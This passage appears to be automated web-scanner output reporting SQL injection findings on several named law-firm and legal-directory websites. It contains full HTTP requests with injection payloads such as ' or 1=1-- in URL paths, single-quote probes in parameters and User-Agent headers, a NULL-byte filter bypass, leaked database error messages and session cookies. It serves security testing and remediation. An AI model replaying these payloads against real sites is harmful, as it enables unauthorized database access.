<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...

1.98. http://www.pillsburylaw.com/scripts/menu.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/menu.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 20011542'%20or%201%3d1--%20 and 20011542'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts20011542'%20or%201%3d1--%20/menu.css?v=20110202 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:13:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10px;
   margin-bottom: 10px;
}
-->
</style>
<!--[if IE]>
<style type="text/css">
bo
...[SNIP]...

Request 2

GET /scripts20011542'%20or%201%3d2--%20/menu.css?v=20110202 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:13:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,
...[SNIP]...

1.99. http://www.pillsburylaw.com/scripts/menu.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/menu.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 14454098'%20or%201%3d1--%20 and 14454098'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/menu.css14454098'%20or%201%3d1--%20?v=20110202 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:13:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10px;
   margin-bottom: 10px;
}
-->
</style>
<!--[if IE]>
<style type="text/css">
bo
...[SNIP]...

Request 2

GET /scripts/menu.css14454098'%20or%201%3d2--%20?v=20110202 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:13:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,
...[SNIP]...

1.100. http://www.pomerantzlaw.com/cases.html [CaseID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pomerantzlaw.com
Path:   /cases.html

Issue detail

The CaseID parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CaseID parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /cases.html?action=caseDetail&CaseID=102%27%00' HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305200941.1305219554.2; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=182215078.1.10.1305219554; __utmc=182215078

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 12 May 2011 17:03:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Length: 23300
Content-Type: text/html; charset=UTF-8

<!-- Railo [3.2.2.000] Error -->


<script>

var plus='data:image/gif;base64,R0lGODlhCQAJAIABAAAAAP///yH5BAEAAAEALAAAAAAJAAkAAAIRhI+hG7bwoJINIktzjizeUwAAOw==';
var minus='data
...[SNIP]...
<td style="border : 1px solid #350606;background-color :#FFCC00;">Line 2: Incorrect syntax near ''.</td>
...[SNIP]...

Request 2

GET /cases.html?action=caseDetail&CaseID=102%27%00'' HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305200941.1305219554.2; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=182215078.1.10.1305219554; __utmc=182215078

Response 2

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 12 May 2011 17:03:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Length: 23363
Content-Type: text/html; charset=UTF-8

<!-- Railo [3.2.2.000] Error -->


<script>

var plus='data:image/gif;base64,R0lGODlhCQAJAIABAAAAAP///yH5BAEAAAEALAAAAAAJAAkAAAIRhI+hG7bwoJINIktzjizeUwAAOw==';
var minus='data
...[SNIP]...

1.101. http://www.pomerantzlaw.com/cases.html [CaseID parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pomerantzlaw.com
Path:   /cases.html

Issue detail

The CaseID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the CaseID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /cases.html?action=caseDetail&CaseID=102' HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305200941.1305200941.1; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 12 May 2011 17:03:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Length: 23366
Content-Type: text/html; charset=UTF-8

<!-- Railo [3.2.2.000] Error -->


<script>

var plus='data:image/gif;base64,R0lGODlhCQAJAIABAAAAAP///yH5BAEAAAEALAAAAAAJAAkAAAIRhI+hG7bwoJINIktzjizeUwAAOw==';
var minus='data
...[SNIP]...
<td style="border : 1px solid #350606;background-color :#FFCC00;">Unclosed quotation mark before the character string '102' <br />
...[SNIP]...

1.102. http://www.pomerantzlaw.com/practice-areas.html [PracticeAreaID parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pomerantzlaw.com
Path:   /practice-areas.html

Issue detail

The PracticeAreaID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the PracticeAreaID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /practice-areas.html?action=practiceAreaDetail&PracticeAreaID=3' HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pomerantzlaw.com/cases.html?action=caseDetail&CaseID=102
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305200941.1305219554.2; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=182215078.2.10.1305219554; __utmc=182215078

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 12 May 2011 17:04:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Length: 23102
Content-Type: text/html; charset=UTF-8

<!-- Railo [3.2.2.000] Error -->


<script>

var plus='data:image/gif;base64,R0lGODlhCQAJAIABAAAAAP///yH5BAEAAAEALAAAAAAJAAkAAAIRhI+hG7bwoJINIktzjizeUwAAOw==';
var minus='data
...[SNIP]...
<td style="border : 1px solid #350606;background-color :#FFCC00;">Unclosed quotation mark before the character string '3' <br />
...[SNIP]...

1.103. http://www.superlawyers.com/pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superlawyers.com
Path:   /pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html HTTP/1.1
Host: www.superlawyers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://layserfreiwald.com/attorneys.html?mode=view&AID=8
Cookie: sl_session=05c2bcb40ffc909956464cbcf8d1857e

Response 1

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:36:02 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 491

insert lawyer profile view tracking: 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://layserfreiwald.com/attorneys.html?mode=view&AID=8')' at line 1:: INSERT INTO lawyer_profile_vie
...[SNIP]...

Request 2

GET /pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html HTTP/1.1
Host: www.superlawyers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1''
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://layserfreiwald.com/attorneys.html?mode=view&AID=8
Cookie: sl_session=05c2bcb40ffc909956464cbcf8d1857e

Response 2

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:36:03 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 22960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...

1.104. http://www.superlawyers.com/redir [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superlawyers.com
Path:   /redir

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /redir?r=http://www.superlawyers.com/pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html&c=150_badge&i=8480c83d-644a-4fd5-9e3b-15644c36fe5e HTTP/1.1
Host: www.superlawyers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://layserfreiwald.com/attorneys.html?mode=view&AID=8

Response 1

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:36:37 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.3.2
Set-Cookie: sl_session=fdc7e2e2ab89726f93f17512e759fb1e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 647

insert click tracking: 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '150_badge','8480c83d-644a-4fd5-9e3b-15644c36fe5e','http://layserfreiwald.com/att' at line 1:: INSERT I
...[SNIP]...

Request 2

GET /redir?r=http://www.superlawyers.com/pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html&c=150_badge&i=8480c83d-644a-4fd5-9e3b-15644c36fe5e HTTP/1.1
Host: www.superlawyers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1''
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
